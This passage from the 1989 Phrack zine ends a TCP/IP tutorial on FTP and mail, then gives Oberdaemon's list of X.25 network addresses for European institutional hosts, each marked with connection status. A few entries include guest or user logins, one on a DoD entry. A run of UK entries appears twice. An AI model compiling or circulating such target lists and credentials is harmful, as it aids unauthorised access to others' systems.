  1448. (new) local host's file name.  Example:
  1449.  
  1450. Ftp> get
  1451. Remote file name?
  1452. theirfile
  1453. local file name?
  1454. myfile
  1455.  
  1456. ou can abbreviate this by typing both file names on the same line as the "get"
  1457. subcommand.  If you do not specify a local file name, the new local file will
  1458. be called the same thing as the remote file.  Valid FTP subcommands to get a
  1459. file include the following:
  1460.  
  1461. get theirfile myfile
  1462. get doc.x25
  1463.  
  1464. The "put" subcommand works in a similar fashion and is used to send a file from
  1465. the local computer to the remote computer.  Enter the command "put" and FTP
  1466. will prompt you for the local file name and then the remote file name.  If the
  1467. transfer cannot be done because the file doesn't exist or for some other
  1468. reason, FTP will print an error message.
  1469.  
  1470. There are a number of other subcommands in FTP that allow you to do many more
  1471. things.  Not all of these are standard so consult your local documentation or
  1472. type a question mark at the FTP prompt.  Some functions often built into FTP
  1473. include the ability to look at files before getting or putting them, the
  1474. ability to change directories, the ability to delete files on the remote
  1475. computer, and the ability to list the directory on the remote host.
  1476.  
  1477. An intriguing capability of many FTP implementations is "third party
  1478. transfers."  For example, if you are logged on computer A and you want to cause
  1479. computer B to send a file to computer C, you can use FTP to connect to computer
  1480. B and use the "rmtsend" command.  Of course, you have to know usernames and
  1481. passwords on all three computers, since FTP never allows you to peek into
  1482. someone's directory and files unless you know their username and password.
  1483.  
  1484. The "cd" subcommand changes your working directory on the remote host.  The
  1485. "lcd" subcommand changes the directory on the local host.  For UNIX systems,
  1486. the meaning of these subcommands is obvious.  Other systems, especially those
  1487. that do not have directory-structured file system, may not implement these
  1488. commands or may implement them in a different manner.
  1489.  
  1490. The "dir" and "ls" subcommands do the same thing, namely list the files in the
  1491. working directory of of the remote host.
  1492.  
  1493. The "list" subcommand shows the contents of a file without actually putting it
  1494. into a file on the local computer.  This would be helpful if you just wanted to
  1495. inspect a file.  You could interrupt it before it reached the end of the file
  1496. by typing CONTROL-C or some other special character.  This is dependent on your
  1497. FTP implementation.
  1498.  
  1499. The "delete" command can delete files on the remote host.  You can also make
  1500. and remove directories on the remote host with "mkdir" and "rmdir".  The
  1501. "status" subcommand will tell you if you are connected and with whom and what
  1502. the state of all your options are.
  1503.  
  1504. If you are transferring binary files or files with any non-printable
  1505. characters, turn binary mode on by entering the "binary" subcommand:
  1506.  
  1507. binary
  1508.  
  1509. To resume non-binary transfers, enter the "ascii" subcommand.
  1510.  
  1511. Transferring a number of files can be done easily by using "mput" (multiple
  1512. put) and "mget" (multiple get).  For example, to get every file in a particular
  1513. directory, first issue a "cd" command to  change to that directory and then an
  1514. "mget" command with an asterisk to indicate every file:
  1515.  
  1516. cd somedirectory
  1517. mget *
  1518.  
  1519. When you are done, use the "close" subcommand to break the communications link.
  1520. You will still be in FTP, so you must use the "bye" subcommand to exit FTP and
  1521. return to the command level.  The "quit" subcommand will close the connection
  1522. and exit from FTP at the same time.
  1523.  
  1524.  
  1525. Mail
  1526. ~~~~
  1527. Mail is the simplest network facility to use in many ways.  All you have to do
  1528. is to create your message, which can be done with a file editor or on the spur
  1529. of the moment, and then send it.  Unlike FTP and Telnet, you do not need to
  1530. know the password of the username on the remote computer.  This is so because
  1531. you cannot change or access the files of the remote user nor can you use their
  1532. account to run programs.  All you can do is to send a message.
  1533.  
  1534. There is probably a program on your local computer which does mail between
  1535. users on that computer.  Such a program is called a mailer.  This may or may
  1536. not be the way to send or receive mail from other computers on the network,
  1537. although integrated mailers are more and more common.  UNIX mailers will be
  1538. used as an example in this discussion.
  1539.  
  1540. Note that the protocol which is used to send and receive mail over a TCP/IP
  1541. network is called SMTP, the "Simple Mail Transfer Protocol."  Typically, you
  1542. will not use any program called SMTP, but rather your local mail program.
  1543.  
  1544. UNIX mailers are usually used by invoking a program named "mail".  To receive
  1545. new mail, simply type "mail".
  1546.  
  1547. There are several varieties of UNIX mailers in existence.  Consult your local
  1548. documentation for details.  For example, the command "man mail" prints out the
  1549. manual pages for the mail program on your computer.
  1550.  
  1551. To send mail, you usually specify the address of the recipient on the mail
  1552. command.  For example: "mail knight@umcvmb.missouri.edu" will send the
  1553. following message to username "knight" on host "umcvmb".
  1554.  
  1555. You can usually type in your message one line at a time, pressing RETURN after
  1556. each line and typing CONTROL-D to end the message. Other facilities to include
  1557. already-existing files sometimes exist.  For example, Berkeley UNIXes allow you
  1558. to enter commands similar to the following to include a file in your current
  1559. mail message:
  1560.  
  1561. r myfile
  1562.  
  1563. In this example, the contents of "myfile" are inserted into the message at this
  1564. point.
  1565.  
  1566. Most UNIX systems allow you to send a file through the mail by using input
  1567. redirection.  For example:
  1568.  
  1569. mail knight@umcvmb.missouri.edu < myfile
  1570.  
  1571. In this example, the contents of "myfile" are sent as a message to "knight" on
  1572. "umcvmb."
  1573.  
  1574. Note that in many UNIX systems the only distinction between mail bound for
  1575. another user on the same computer and another user on a remote computer is
  1576. simply the address specified.  That is, there is no hostname for local
  1577. recipients.  Otherwise, mail functions in exactly the same way.  This is common
  1578. for integrated mail packages.  The system knows whether to send the mail
  1579. locally or through the network based on the address and the user is shielded
  1580. from any other details.
  1581.  
  1582.  
  1583.                   "The Quest For Knowledge Is Without End..."
  1584. _______________________________________________________________________________
  1585.  
  1586.  
  1587.                                 ==Phrack Inc.==
  1588.  
  1589.                      Volume Three, Issue 27, File 4 of 12
  1590.  
  1591.                :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
  1592.                :.:                                           :.:
  1593.                :.:  NUA-List For Datex-P And X.25 Networks   :.:
  1594.                :.:                                           :.:
  1595.                :.:               by Oberdaemon               :.:
  1596.                :.:                                           :.:
  1597.                :.:               April 9, 1989               :.:
  1598.                :.:                                           :.:
  1599.                :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
  1600.  
  1601.  _____________________________________________________________________________
  1602. |                                                                             |
  1603. |  Key:                                                                       |
  1604. |                                                                             |
  1605. |  A    = successfully connected                                              |
  1606. |  B    = sources say that it works                                           |
  1607. |  C    = officially closed                                                   |
  1608. |  D    = disconnected/no circuit or permanently busy                         |
  1609. |  I    = illegal address or invalid call                                     |
  1610. |  O    = out of order                                                        |
  1611. |  r    = R-NUA                                                               |
  1612. |  T    = time-out                                                            |
  1613. |  X    = sources say that it should work but it doesn't (or is permanently   |
  1614. |         busy)                                                               |
  1615. |  Y    = barred (=?)                                                         |
  1616. |  Z    = sources say that it should not work                                 |
  1617. |      = including the following digits gives you another number             |
  1618. |  n/a  = not yet tested                                                      |
  1619. |  ?    = error on a subsequent communication system                          |
  1620. |                                                                             |
  1621. | Remark: I have also included some obviously misstyped NUAs which have been  |
  1622. |         found in widely circulating lists.  There are also numbers which do |
  1623. |         not form a valid NUA but a common prefix (e.g. 0202 2  Helpak).     |
  1624. |                                                                             |
  1625. | Format: Each NUA in this list consists of the following fields:             |
  1626. |                                                                             |
  1627. |         cccc naa aaa aaa... oooo...      ddd....                            |
  1628. |                                                                             |
  1629. |  cccc       is the country prefix (e.g. 0262 Germany). This prefix can be   |
  1630. |             omitted when calling and called party have both the same prefix.|
  1631. |  naa        are the first three digits of the address. n often specifies a  |
  1632. |             certain network in that country.                                |
  1633. |  aaa aaa... are the other digits of the address.                            |
  1634. |  oooo...    are some extra digits/letters which should be added after the   |
  1635. |             NUA. The correct syntax depends on your PAD. This list uses any |
  1636. |             syntax - usually depending on the notation the author of the    |
  1637. |             source used. The oooo... field is usually empty.                |
  1638. |  ddd...     is a short description of the service.                          |
  1639. |                                                                             |
  1640. | If you find two NUAs who differ only in the number of trailing zeroes, but  |
  1641. | connect to the same service, you may safely throw away the longer one.      |
  1642. |                                                                             |
  1643. |  !!  Please note that most PADs don't accept spaces inside a NUA  !!        |
  1644. |_____________________________________________________________________________|
  1645.  
  1646.  
  1647.   0200                  GR         Greece
  1648.   0202
  1649.   0202 2                           Helpak (enkelriktad trafik)
  1650. X 0202 452 241 24104
  1651.   0204                  NL         Netherlands
  1652.   0204 0                           Datanet (1?)
  1653.   0204 1                           Datanet (1?)
  1654. A 0204 129 001 3                   ? (Netz ?)
  1655. A 0204 129 001 4                   X.25
  1656. A 0204 129 003 1                   NONOBY
  1657. A 0204 129 003 4                   Searchline
  1658. D 0204 129 004 33       SARA       National Institute for High Energy Physics
  1659.                                    (NIKHEF) SARA network
  1660. D 0204 129 004 34       NIKHEF     National Institute for High Energy Physics
  1661.                                    (NIKHEF) SARA network
  1662. D 0204 129 005 6        MCVAX      MCVAX, HOLLAND
  1663. A 0204 129 005 675      HARING     MCVAX Line 2
  1664.    0204 129 400 2                   DUPHAR WEESP,HOLLAND
  1665. A 0204 134 014 80500               Utrecht ?
  1666.   0204 303 0                       EPOIS EPO Den Haag
  1667.   0204 304 0                       DSAMISOOM SAMSON
  1668.   0204 4                           Dabas
  1669.   0206                  B          Belgium
  1670.   0206 2                           DCS
  1671. A 0206 210 300 003                 Eigebib
  1672. A 0206 222 100 6        BBDA       Brussels DEC A
  1673. A 0206 222 101 2        ?          Ministry of economic affairs
  1674. A 0206 222 102 6                   celex
  1675. A 0206 224 001 903      PRLB2      Belgium Unix Backbone
  1676.   0206 3                           Euronet
  1677. A 0206 228 821 0                   DGxiiiF
  1678.   0208                  F          France
  1679.   0208 0                TRANSPAC   French Transpac
  1680. A 0208 006 040 010                 Telesystemes 1
  1681. A 0208 006 040 201                 Telesystemes 2
  1682. A 0208 026 020 843                 ?
  1683. A 0208 034 020 036      CNUSC      CNUSC (France)
  1684. A 0208 034 020 258      CNUSC      CNUSC Montpelier
  1685. A 0208 038 020 100                 CICG Grenoble
  1686. A 0208 038 020 676                 ILL VEGA VAX 8700 VMS 4.7
  1687. I 0208 044 001 645                 ?
  1688. A 0208 057 040 540                 QSD (Chat system)
  1689. I 0208 069 021 258
  1690. A 0208 075 000 087      IRCAM      IRCAM-ERIK VAX 11/780 4.2 BSD
  1691. I 0208 075 000 355                 ?
  1692. I 0208 075 001 281*D    CCPN       Computing Centre Nuclear Physics
  1693. I 0208 075 002 314                 GRF
  1694. A 0208 075 020 655      LITP       LITP Unix 4.3 BSD (France)
  1695. A 0208 075 041 280                 Pasteur MV8000
  1696. A 0208 078 020 118      INRIA      INRIA, Rocquencourt (France) Multics
  1697. B 0208 078 020 16901    INRIA      Institute National de Recherche en
  1698.                                    Informatique
  1699.   0208 078 081 67304    INRIAUU    INRIA - UUCICO
  1700. I 0208 091 000 270*DCISICISI3      IBM - TSO
  1701. I 0208 091 000 309*DCISICISI1      IBM - TSO
  1702. I 0208 091 000 519*DCISICISI2      IBM - TSO
  1703. I 0208 091 010 320      CJRCE
  1704. I 0208 091 040 047      SACLAY     Saclay - France
  1705. I 0208 091 040 532                 Pascal
  1706. A 0208 091 190 258                 LURE, VAX 11/780 VMS 4.6, Synchrotron
  1707.                                    source (SES)
  1708.   0208 1                           NTI
  1709. A 0208 101              TEXTFRA    Text Generator, FRANCE
  1710.   0214                  E          Spain
  1711.   0214 1                SPAIN      Spanish data network (NID/CTNE)
  1712.   0214 5                           Iberpac
  1713. O 0214 521 202 5022
  1714. A 0214 521 302 1020                ETSITM (EANNET) VAX 11/750 VMS 4.5
  1715.   0222                  I          Italy
  1716.   0222 2                           Itapac
  1717. A 0222 262 002 1        ESAIRS1    ESA-QUEST, IRS 1
  1718. I 0222 262 002 2        ESAIRS2    ESA-IRS 2
  1719. O 0222 262 003 2                   IASI VAX
  1720. A 0222 262 004 3                   VAXLNF (INFNET) VAX 8650
  1721. O 0222 263 200 4                   NUA-Information ?
  1722. A 0222 265 014 0                   Techni-Link
  1723. I 0222 306 3                       Progetto-Sirio
  1724. I 0222 306 700                     European Space Agency
  1725. I 0222 306 9*D          CNUCE      CNUCE
  1726. I 0222 307 0                       CILEA
  1727. I 0222 307 1                       CED Datenbanksysteme Rom
  1728. I 0222 307 2*D          RTC20      JRC
  1729. I 0222 307 7*D QUESTD5  ESA        ESA
  1730. D 0222 307 8*D QUESTD5  ESA2       ESA
  1731.   0228                  CH         Switzerland
  1732. D 0228 310 1*DN         DATASTAR   Data-Star, Switzerland
  1733.   0228 4                           Telepac
  1734. A 0228 462 110 0101                Cigy IBMA
  1735. A 0228 462 110 0102                Cigy DEC1091
  1736. A 0228 462 110 09                  EDP Basel
  1737. A 0228 462 110 23                  ?
  1738. A 0228 462 110 34                  ?
  1739. A 0228 462 110 36                  ?
  1740. A 0228 462 110 52                  DANZA'S 11/785 VMS 4.4
  1741. A 0228 462 110 61                  PKK node RBPK00
  1742. A 0228 462 110 66                  PROGNOS Basel (CIERR 1402)
  1743. A 0228 462 110 70                  ?
  1744. A 0228 462 110 84                  (CIERR 1402)
  1745. Y 0228 462 170 02                  INFOTEX PTT
  1746. I 0228 464 109 06                  GD PTT Schweiz (ring with CTRL G)
  1747. A 0228 464 110 10       DM         DATAMAIL (RSAG)
  1748. A 0228 464 110 110      DSTAR2     Datastar (2nd. Line)
  1749. A 0228 464 110 112                 RSAG
  1750. Z 0228 464 110 113                 RSAG
  1751. A 0228 464 110 115      DATASTAR   Data-Star, Switzerland (Pharmadatenbank ?)
  1752. A 0228 468 113 150                 Management Joint Trust
  1753. D 0228 468 114 05       CERN       CERN (=CERNXX?)
  1754. A 0228 468 114 0505                CS Group LAVC on node UXCOMS
  1755. A 0228 468 114 0510     CER        CERN, Geneva
  1756. A 0228 468 114 0510     CERNVAX    CERN X25 Multigate
  1757. B 0228 468 114 0510*DLO CERNLO     CERN 300 bps     OUTDIAL (where ???)
  1758. B 0228 468 114 0510*DME CERNME     CERN 1200 bps    OUTDIAL (where ???)
  1759. B 0228 468 114 0510*DHI            CERN ?
  1760. A 0228 468 114 0514                4.2 BSD UNIX (Mint)
  1761. A 0228 468 114 0515                Cern LS Group LAVC VXGIFT
  1762. A 0228 468 114 0520                Cern
  1763. A 0228 468 114 0532                Cern
  1764. A 0228 468 114 0533                L3 test beam VAX-750 VXC3
  1765. A 0228 468 114 0534                UXINFN
  1766. A 0228 468 114 0538                CS Group LAVC on node UXCOMS
  1767. A 0228 468 114 054                 Cern
  1768. A 0228 468 114 0545                Cern
  1769. A 0228 468 114 0551                VXCERN VMS 4.6
  1770. A 0228 468 114 0553                VXCERN VMS 4.6
  1771. A 0228 468 114 0556                VXCERN VMS 4.6
  1772. A 0228 468 114 0560                CERN VXNA31
  1773. A 0228 468 114 0561                CERN VXNA31
  1774. A 0228 468 114 0562                L3 VAX 11/750 VXC3MU
  1775. A 0228 468 114 0572                ISOLDES VAX 11/750
  1776. A 0228 468 114 0574                ? (Operator)
  1777. A 0228 468 114 0581                ?
  1778. A 0228 468 114 0583                %Merit:X.25 (Merit Computer Network, see
  1779.                                    appendix)
  1780. A 0228 468 114 0584                Develcon
  1781. A 0228 468 114 0587                ? (Operator)
  1782. A 0228 468 114 0588                ? (Operator)
  1783. A 0228 468 114 0589                ? (Operator)
  1784. A 0228 468 114 0592                Princeton University High Energy Physics
  1785.                                    Group Vax 11/750
  1786. A 0228 468 114 0593                University of Michigan Physics Vax 11/750
  1787. A 0228 468 114 0596                N.U. Physics Vax 11/750
  1788. A 0228 468 114 0597                Harvard University High Energy Physics Lab.
  1789.                                    Vax 8650
  1790. A 0228 468 114 0598                MIT-LNS*PIERRE
  1791. A 0228 468 114 0599                DoD, Distributed Databases Coordination
  1792.                                     Center (JMILLER,X0TF3AP)
  1793. D 0228 468 114 18                  BIOGEN (=GODEL?)
  1794. A 0228 468 114 23                  EDCHUB::
  1795. A 0228 469 110 02                  EPFL (something)
  1796. A 0228 469 110 0202                EPFL HELP
  1797. D 0228 469 110 0203                EPFL DE.VAX
  1798. D 0228 469 110 0204                EPFL GC.VAX
  1799. A 0228 469 110 0205                EPFL DP.VAX
  1800. A 0228 469 110 0206                EPFL ME.VAX
  1801. A 0228 469 110 0207                EPFL GR.VAX
  1802. A 0228 469 110 0208                EPFL MA.VAX
  1803. A 0228 469 110 0209                EPFL DI.VAX
  1804. D 0228 469 110 0210                EPFL IMAC.PDP
  1805. D 0228 469 110 0211                EPFL CGL.VAX
  1806. D 0228 469 110 0212                EPFL DE.MVAX
  1807. A 0228 469 110 0213                EPFL CC.VAX
  1808. A 0228 469 110 03                  EPFL Cyber 855
  1809. Ar0228 469 110 0301                EPFL Cyber
  1810. A 0228 475 110 02                  HSG St.Gallen
  1811. Ar0228 479 104 00                  Cern
  1812. A 0228 479 110 23                  I.P.Sharp (CA)
  1813. X 0228 479 110 86                  KOMETH (ETH ZH)
  1814. A 0228 479 110 650                 KOMETH (ETH ZH)
  1815. I 0228 479 111
  1816. A 0228 479 111 06                  GRS
  1817. I 0228 479 111 086
  1818. I 0228 479 111 11
  1819. I 0228 479 111 18                  ZEV-Mailbox Zuerich
  1820. A 0228 479 111 750                 ComNet (R-Nua)
  1821. A 0228 479 311 49                  KOMETH Output (ETH ZH)
  1822. A 0228 499 111 02001               KOMETH (Entry Uni)
  1823.   0228 9                           Radio-Suisse
  1824.   0232                  A          Austria
  1825.   0232 2                           Datex-P
  1826. O 0232 242 210 91
  1827. ? 0232 242 211 42*DMAI             Sysnet Wien (Gast,Gast)
  1828. A 0232 252 310 000                 Uni Wien
  1829.   0232 9                           Radio Austri
  1830. A 0232 911 602 323                 Inpadoc
  1831.   0234                  GB         United Kingdom
  1832.   0234 1                IPSS       IPSS UK network
  1833. A 0234 110 020 02018               BT DIALCOM GROUP (PRESTEL ?)
  1834.   0234 2                           PSS
  1835.   0234 198 061 60                  Queen Marry C.
  1836. B 0234 207 920 002                 SWVA
  1837.   0234 211 920 100515              Hostess Doc.
  1838.   0234 212                         Dialnet
  1839. O 0234 212 080 105
  1840. I 0234 212 080 110      EPSONUK    Epson (UK)
  1841. A 0234 212 300 120      DIALNET    IGS Leased line to DIALOG in US
  1842. A 0234 212 300 12011    DIALNET    LRS-DIALOG 2   Dialog via London
  1843. Ar0234 212 300 12013    DIALMRC    LRS-Dialmail   (Reverse Charging)
  1844. A 0234 212 300 120*D@   DIALNET    IGS Leased line to DIALOG in US
  1845. A 0234 212 300 2920                GeoNet GEO2
  1846. B 0234 212 301 161                 OPTEL
  1847.   0234 212 301 186                 GEOSYSTEMS
  1848.   0234 212 301 187                 CAP GROUP LTD.
  1849.   0234 212 301 18722    CAP        CAP Industry Ltd.
  1850.   0234 212 301 281                 ONE TO ONE COMMS
  1851. O 0234 212 302 02192    PSSCLK     PSS Clock
  1852. B 0234 212 399 12013    DIALMAL    Dialmail via London
  1853. A 0234 212 900 115      STL        STL : ACER (BSD UNIX 4.2)
  1854.   0234 213 000 11
  1855.   0234 213 000 151      COMPUTAS   Computas Ltd
  1856.   0234 213 000 1511                COMPUTAS LTD.
  1857. D 0234 213 900 10150   ALVEY      Alvey Mail and FTP.
  1858.   0234 214 200 162      GLAXO      Galaxo Industries
  1859.   0234 214 400 12                  CONTROL DATA LTD.
  1860.   0234 215 000 11600    C3
  1861.   0234 215 710 104                 Consultans Ltd
  1862.   0234 216 700 127      PFIZER     Pfizer, SANDWICH
  1863.   0234 216 700 12701    PFIZER1    Pfizer, SANDWICH
  1864.   0234 216 700 12702    PFIZER2    Pfizer, SANDWICH
  1865.   0234 216 700 12703    PFIZER3    Pfizer, SANDWICH
  1866.   0234 216 700 12704    PFIZER4    Pfizer, SANDWICH
  1867.   0234 216 700 12706    PFIZER6    Pfizer, SANDWICH
  1868.   0234 218 801 00300               British Telecom Hotline
  1869.   0234 2                           PSS
  1870.   0234 198 061 60                  Queen Marry C.
  1871. B 0234 207 920 002                 SWVA
  1872.   0234 211 920 100515              Hostess Doc.
  1873.   0234 212                         Dialnet
  1874. O 0234 212 080 105
  1875. I 0234 212 080 110      EPSONUK    Epson (UK)
  1876. A 0234 212 300 120      DIALNET    IGS Leased line to DIALOG in US
  1877. A 0234 212 300 12011    DIALNET    LRS-DIALOG 2   Dialog via London
  1878. Ar0234 212 300 12013    DIALMRC    LRS-Dialmail   (Reverse Charging)
  1879. A 0234 212 300 120*D@   DIALNET    IGS Leased line to DIALOG in US
  1880. A 0234 212 300 2920                GeoNet GEO2
  1881. B 0234 212 301 161                 OPTEL
  1882.   0234 212 301 186                 GEOSYSTEMS
  1883.   0234 212 301 187                 CAP GROUP LTD.
  1884.   0234 212 301 18722    CAP        CAP Industry Ltd.
  1885.   0234 212 301 281                 ONE TO ONE COMMS
  1886. O 0234 212 302 02192    PSSCLK     PSS Clock
  1887. B 0234 212 399 12013    DIALMAL    Dialmail via London
  1888. A 0234 212 900 115      STL        STL : ACER (BSD UNIX 4.2)
  1889.   0234 213 000 11
  1890.   0234 213 000 151      COMPUTAS   Computas Ltd
  1891.   0234 213 000 1511                COMPUTAS LTD.
  1892. D 0234 213 900 10150   ALVEY      Alvey Mail and FTP.
  1893.   0234 214 200 162      GLAXO      Galaxo Industries
  1894.   0234 214 400 12                  CONTROL DATA LTD.
  1895.   0234 215 000 11600    C3
  1896.   0234 215 710 104                 Consultans Ltd
  1897.   0234 216 700 127      PFIZER     Pfizer, SANDWICH
  1898.   0234 216 700 12701    PFIZER1    Pfizer, SANDWICH
  1899.   0234 216 700 12702    PFIZER2    Pfizer, SANDWICH
  1900.   0234 216 700 12703    PFIZER3    Pfizer, SANDWICH
  1901.   0234 216 700 12704    PFIZER4    Pfizer, SANDWICH
  1902.   0234 216 700 12706    PFIZER6    Pfizer, SANDWICH
  1903.   0234 218 801 00300               British Telecom Hotline
  1904.   0234 219                         PSS-Network
  1905.   0234 219 200 001                 Network Monitoring Centre (NFS)
  1906.   0234 219 200 002                 Network Monitoring Centre (NFS)
  1907.   0234 219 200 100                 University of London Computing Centre
  1908.   0234 219 200 10069    JANETGW    PSS/JANET Gateway (ULCC)
  1909. B 0234 219 200 101                 Finsbury Data Service
  1910.   0234 219 200 1082                BING COMPUTER SERVICES (EUROPE) LTD.
  1911. A 0234 219 200 118      ADPUK      ADP NETWORK SERVICES LTD. (=AUTONET?)
  1912.   0234 219 200 118                 atomic energy research establishment
  1913.   0234 219 200 13370    QTLON      Quantime
  1914. A 0234 219 200 146      CEGB       CEGB, Park Street, London
  1915. B 0234 219 200 14869    ULCC       Univ. London Computer Centre (=JANET2?)
  1916. B 0234 219 200 14918    UCLMVAX    UCL Microvax ARPA Gateway
  1917. B 0234 219 200 14970
  1918.   0234 219 200 154                 UNILEVER COMPUTER SERVICES LTD.
  1919. A 0234 219 200 171      LEXIS      LEXIS
  1920. A 0234 219 200 190      INFOLINE   PERGAMON INFOLINE LTD. (NFS)
  1921. A 0234 219 200 203      IPSH       SHARP, I. P. ASSOCIATES LTD.
  1922. A 0234 219 200 220                 BRITISH LIBRARY ON-LINE SYSTEM
  1923. A 0234 219 200 222      BLAISE     British Library Information System
  1924.   0234 219 200 297                 RLFE & NOLAN COMPUTER SERVICES PLC
  1925. B 0234 219 200 300      UCL        University College London - Computer
  1926.   0234 219 200 300      UCLFTP     UCL (FTP)
  1927. A 0234 219 200 300      UCLMAIL    UCL (JNT Mail)
  1928.   0234 219 200 304                 University Computing Company (GB) Ltd.
  1929. B 0234 219 200 333      EUCLID     University College London  Computer Centre
  1930.   0234 219 200 394      CISI       CISI (=SIANET?;=Computer Services, London?)
  1931.   0234 219 200 871                 Instrument Rentals (UK) Ltd.
  1932. B 0234 219 201 002      POOLE
  1933.   0234 219 201 004      BGOLD81    Telecom BT-GOLD System 81
  1934.   0234 219 201 00472    BGOLD72    Telecom BT-GOLD System 72
  1935.   0234 219 201 00474    BGOLD74    Telecom BT-GOLD System 74
  1936.   0234 219 201 00479    BTGOLD     Telecom BT-GOLD System 79
  1937.   0234 219 201 00481    BTGOLDA    Telecom BT-GOLD System 81
  1938.   0234 219 201 00482    BTGOLD82   Telecom BT-GOLD System 82
  1939.   0234 219 201 00484    BGOLD84    Telecom Gold System 84
  1940.   0234 219 201 005      PSSMAIL    PSS TELE-MAIL service
  1941. B 0234 219 201 00513    DIANENQ    Euronet DIANE Enquiry Service
  1942.                                    (=Echo,Rutherford?)
  1943. B 0234 219 201 00513    EUROINFO   Euronet Diane Information Service
  1944.                                    (=Echo,Rutherford?)
  1945. A 0234 219 201 00515    BTDOC      BT Online Documentation Service
  1946. A 0234 219 201 00515    HOSTESS    Hostess system (BT)
  1947.   0234 219 201 00530    BAYNARD    BT Protocol Study Centre (NFS)
  1948.   0234 219 201 00615    PSSDOC     PSS documentation service/X25 technical
  1949.                                    info on line
  1950.   0234 219 201 00620    BTBILL     BT Online Billing
  1951.   0234 219 201 0100513
  1952.   0234 219 201 01013    HOSTESS    Hostess system (BT) (=PSS Switchstream 1 ?)
  1953. T 0234 219 201 01030    TSTB       British Telecom
  1954.   0234 219 201 025      PRESTEL    BT Prestel Service
  1955.   0234 219 201 02517
  1956.   0234 219 201 07800
  1957.   0234 219 201 15600    ESA1       ESA-IRS via London
  1958.   0234 219 201 18       ADPUK      ADP Network Services Ltd
  1959.   0234 219 210 050                 BT Mailbox facility (NFS)
  1960.   0234 219 511 31       GEC        GEC Computers Borehamwood
  1961.   0234 219 511 311      GECB       GEC Computers Ltd. Borehamwood
  1962.   0234 219 513 11       GECB       GEC Computers Ltd. Borehamwood
  1963.   0234 219 709 111                 Modular Computer Services Ltd. (MODCOMP)
  1964. ? 0234 219 709 111      NPL1       National Physical Laboratory
  1965.   0234 219 709 210      NPL2       National Physical Laboratory, Protocol Std
  1966.                                    Group
  1967. B 0234 219 806 160      QMC        Queen Mary College London
  1968. X 0234 220 200 1070                island-Adventure-Game
  1969. X 0234 220 200 10700               island-Adventure-Game
  1970.   0234 220 641 141      ESSX       Essex, University of, Computing Service
  1971.                                    (2653,2653,Mist)
  1972. A 0234 220 641 1411                MUD (Adventure Game), <guest>, <mist> or
  1973.                                    <2653,2653>
  1974. B 0234 221 222 122      MIDB       MIDNET Gateway at Birmingham (=MIDBHM)
  1975.   0234 221 222 223      BIRP       Prime R & D at Birmingham
  1976.   0234 221 222 225                 Freight Comp. Services
  1977.   0234 222 236 163      CARDF      Cardiff, University College
  1978.   0234 222 236 16300    CARDIFF    Univ. Coll. Cardiff Multics
  1979.   0234 222 236 236      UWIST      University of Wales
  1980.   0234 222 300 16102    ACORN      Acorn Computers
  1981.   0234 222 339 399      CAMBRID    Cambridge University (Phoenix)
  1982.   0234 222 530 303      SWURCC     South-West Universities
  1983.   0234 222 530 30388    SWURCC     South-West Universities Network
  1984.   0234 222 530 30398    SWCFTP     SWURCC (FTP)
  1985. A 0234 222 715 151      KENT       University of Kent
  1986. X 0234 222 715 11                  ? (---,Guest,Friend (call PIP))
  1987.   0234 223 440          TI         Texas Instruments Ltd
  1988.   0234 223 440 144      BED5       Prime R & D at Bedford (NFS)
  1989.   0234 223 440 345      TI         Texas Instruments Ltd
  1990.   0234 223 500 10998    HLH        High Level Hardware Ltd.
  1991. B 0234 223 519 111      AERE       Atomic Energy Research Establishment at
  1992.                                    Harwell
  1993. T 0234 223 519 11198    ADA        ADA UK Database
  1994.   0234 223 519 119169              JANET
  1995.   0234 223 519 191      DLVAFTP    Daresbury SRS VAX (FTP)
  1996. A 0234 223 519 191      JANET      Gateway to JANET at Rutherford
  1997.   0234 223 519 191      OUCSFTP    OUCS VAX (FTP) - Experimental
  1998.   0234 223 519 191      REVSFTP    ROE Starlink VAX (FTP)
  1999.   0234 223 519 191      RLDAFTP    Rutherford DCS 11/70 (FTP)
  2000.   0234 223 519 191      RLGBFTP    RL GEC (FTP)
  2001.   0234 223 519 191      RLIBFTP    RL IBM 370 CMS (FTP)
  2002.   0234 223 519 191      RLPCFTP    L Prime C (FTP)
  2003.   0234 223 519 191      SERC       Gateway to SERCNET at Rutherford
  2004.   0234 223 519 191      SERCENQ    SERCNET Acc & P/word Fac.
  2005.   0234 223 519 191      SYPEFTP    Surrey Prime 550 (FTP)
  2006.   0234 223 519 191      UEAFTP     East Anglia via SERC (FTP)
  2007.   0234 223 519 191      ZUVSFTP    UCL Starlink VAX (FTP)
  2008. A 0234 223 519 19169    SERCNET    R/ford XXX SERCnet g/way
  2009.                                    (=DARESBURY,=JANET?)
  2010. ? 0234 223 519 19169,.10404000     Lancaster Uni
  2011. B 0234 223 519 19169,.36           Oxford2
  2012. ? 0234 223 519 19169,49000001
  2013. B 0234 223 519 19169,.50200014     Oxford
  2014. B 0234 223 519 19169,.CPVC         Omega VAX
  2015. A 0234 223 519 19169,.CPVD         Merlin VAX
  2016. B 0234 225 621 126      DECSS      DEC Software Support VAX (=BEANO?)
  2017.   0234 227 200 110                 GEAC 8000 ITI
  2018.   0234 227 200 112      HPLB       HPLB (Hewlett Packard Labs, Bristol)
  2019.   0234 227 230 230      BRST       University of Bristol
  2020.   0234 227 230 23000    BRISTOL    University of Bristol
  2021.   0234 227 230 231                 DLLON Comp. & Manag. Services Ltd.
  2022.   0234 227 230 301                 GAC Computers Ltd.
  2023.   0234 227 230 333      AVON       Avon Universities Computer Centre
  2024.   0234 227 230 33300    AUCC       Avon Universities Computer Centre
  2025.   0234 227 230 33398    AUCCFTP    AUCC (FTP)
  2026. B 0234 227 900 102      BLAISE     British Library Information System
  2027.   0234 227 900 10400    ESTELLE    STC Estelle
  2028.   0234 227 900 14302    ITT        ITT Harlow (=ALCATEL?)
  2029.   0234 231 300 101                 PRIME Office, Edinburgh
  2030.   0234 231 300 102                 Forestry Commission FTP
  2031.   0234 231 300 105      LATTLOG    Lattice Logic LTD
  2032.   0234 231 300 107
  2033. B 0234 231 354 354      ERCC       Edinburgh Regional Computer Centre
  2034.   0234 231 354 35419    BUSHFTP    RCO 2988 (FTP)
  2035. B 0234 231 354 35422    ERCC       ERCC - 2980, 2972 (EMAS) (=RCONET?)
  2036.   0234 232 500 124      EXIS       EXIS
  2037. I 0234 233 458 158      STAND      St. Andrews University VAX
  2038. B 0234 233 458 15898    STANFTP    St. Andrews Univ. (FTP)
